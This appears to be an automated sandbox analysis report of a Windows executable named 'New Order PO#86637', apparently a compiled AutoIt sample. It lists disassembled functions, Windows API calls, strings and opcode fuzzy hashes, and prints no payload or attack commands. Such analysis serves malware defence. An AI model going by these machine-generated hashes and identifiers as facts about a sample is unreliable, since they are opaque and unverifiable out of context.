                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                            • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID: 0
                                                                            • API String ID: 2353593579-4108050209
                                                                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                            APIs
                                                                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                            • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                            • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                            • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                            • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                            • GetSysColor.USER32(00000008), ref: 0044A265
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                            • String ID:
                                                                            • API String ID: 1744303182-0
                                                                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                            • __mtterm.LIBCMT ref: 00417C34
                                                                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                            • __init_pointers.LIBCMT ref: 00417CE6
                                                                            • __calloc_crt.LIBCMT ref: 00417D54
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                            • API String ID: 4163708885-3819984048
                                                                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                            • API String ID: 0-1896584978
                                                                            • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                            • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                            • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                            • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2485277191-404129466
                                                                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                            APIs
                                                                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                            • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                            • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                            • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                            • GetDesktopWindow.USER32 ref: 0045476F
                                                                            • GetWindowRect.USER32(00000000), ref: 00454776
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                            • GetClientRect.USER32(?,?), ref: 004547D2
                                                                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00464B28
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                            • _wcslen.LIBCMT ref: 00464C28
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                            • _wcslen.LIBCMT ref: 00464CBA
                                                                            • _wcslen.LIBCMT ref: 00464CD0
                                                                            • _wcslen.LIBCMT ref: 00464CEF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$Directory$CurrentSystem
                                                                            • String ID: D
                                                                            • API String ID: 1914653954-2746444292
                                                                            • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                            • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                            APIs
                                                                            • _wcsncpy.LIBCMT ref: 0045CE39
                                                                            • __wsplitpath.LIBCMT ref: 0045CE78
                                                                            • _wcscat.LIBCMT ref: 0045CE8B
                                                                            • _wcscat.LIBCMT ref: 0045CE9E
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                            • _wcscpy.LIBCMT ref: 0045CF61
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                            • String ID: *.*
                                                                            • API String ID: 1153243558-438819550
                                                                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll
                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                            • API String ID: 3832890014-4202584635
                                                                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                            • GetFocus.USER32 ref: 0046A0DD
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$CtrlFocus
                                                                            • String ID: 0
                                                                            • API String ID: 1534620443-4108050209
                                                                            • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                            • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                            APIs
                                                                            • DestroyWindow.USER32(?), ref: 004558E3
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateDestroy
                                                                            • String ID: ,$tooltips_class32
                                                                            • API String ID: 1109047481-3856767331
                                                                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                            • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                            • GetMenuItemCount.USER32 ref: 00468CFD
                                                                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                            • GetCursorPos.USER32(?), ref: 00468D3F
                                                                            • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                            • String ID: 0
                                                                            • API String ID: 1441871840-4108050209
                                                                            • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                            • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
